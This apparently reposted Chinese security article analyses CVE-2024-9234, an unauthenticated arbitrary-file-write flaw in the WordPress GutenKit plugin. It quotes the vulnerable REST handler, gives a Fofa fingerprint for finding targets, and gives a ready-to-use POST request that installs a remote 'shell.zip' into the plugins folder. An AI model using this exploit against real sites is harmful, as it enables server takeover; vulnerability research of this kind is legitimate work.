0x00 前言
CVE-2024-9234,看到网上没有相关文章或EXP,遂分析一下.
GutenKit 是一个WordPress的页面构建器,在 Gutenberg 设计您的下一个 WordPress 网站。借助 Gutenberg 的原生拖放界面、50+ WordPress 块、14+ 多功能模块和 500+ 模板,您可以在几分钟内创建专业、响应迅速的 Web 内容,这个漏洞是一个标准的远程文件写入漏洞. 插件下载量: 9000+
影响范围 <=2.1.0
Fofa指纹:"wp-content/plugins/gutenkit-blocks-addon"
首先下载安装WordPress 插件GutenKit 2.1.0 然后启用插件
Wordpress Test Version:5.6.1
0x01 漏洞分析
位于/wp-content/plugins/gutenkit-blocks-addon/includes/Admin/Api/ActivePluginData.php 控制器中的 install_and_activate_plugin_from_external 方法存在很明显的文件下载操作,通过Download_file方法下载ZIP文件,并且直接将其解压到 /wp-content/plugins/ 目录中.
public function install_and_activate_plugin_from_external($request) {// The external plugin URL$plugin_url = $request->get_param('plugin');$slug = $request->get_param('slug');$plugin_slug = "$slug/$slug.php";$plugin_dir = WP_PLUGIN_DIR; // This points to wp-content/pluginsrequire_once ABSPATH . 'wp-admin/includes/file.php';require_once ABSPATH . 'wp-admin/includes/plugin.php';require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';WP_Filesystem();// Download the plugin ZIP file$temp_file = download_url($plugin_url);if (is_wp_error($temp_file)) {wp_send_json_error('Failed to download plugin. Error: ' . $temp_file->get_error_message());return;}$command = "unzip $temp_file -d $plugin_dir";exec($command);// Unzip the plugin into the wp-content/plugins directory$unzip_result = unzip_file($temp_file, $plugin_dir);// Delete the temporary file after unzippingunlink($temp_file);if (is_wp_error($unzip_result)) {wp_send_json_error('Failed to unzip plugin. Error: ' . $unzip_result->get_error_message());return;}// Check if the plugin directory exists$plugin_path = $plugin_dir . '/' . $plugin_slug;if (!file_exists($plugin_path)) {wp_send_json_error('The plugin directory does not exist after unzipping.');return;} else {wp_send_json_success('Plugin installed successfully!');}}
追踪一下入口函数 : 同样在此控制器文件中注册了Rest Api端点及操作.
public function __construct() {add_action('rest_api_init', function() {register_rest_route('gutenkit/v1', 'active-plugin',array('methods' => WP_REST_Server::READABLE,'callback' => [$this, 'action_get_active_plugin'],'permission_callback' => '__return_true',),);});add_action('rest_api_init', function() {register_rest_route('gutenkit/v1', 'install-active-plugin',array('methods' => WP_REST_Server::EDITABLE,'callback' => [$this, 'install_and_activate_plugin_from_external'],'permission_callback' => '__return_true',),);});}
所以只需要请求 /wp-json/gutenkit/v1/install-active-plugin 即可进行写入
0x02 漏洞复现
首先需要准备一个php文件,里边写上<?php phpinfo();?>,然后压缩一下ZIP,之后上传在云服务器或者VPS里(不推荐用https协议).
Payload:
POST /wp-json/gutenkit/v1/install-active-plugin HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: no-cacheConnection: keep-aliveContent-Length: 50Content-Type: application/x-www-form-urlencodedHost: 127.0.0.1Origin: http://127.0.0.1Pragma: no-cacheReferer: http://127.0.0.1/wp-json/gutenkit/v1/install-active-pluginSec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-fetch-user: ?1plugin=http://xxx.xxx/shell.zip
当出现 The plugin directory does not exist after unzipping. 的错误时,其实已经成功了,zip已经被解压到了 /wp-content/plugins/ 中,直接访问即可.
0x03 插件下载
标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转
GutenKit 源码关注公众号发送 241016 获取!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!
原文始发于微信公众号(星悦安全):Wordpress GutenKit 插件远程文件写入漏洞分析(RCE)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论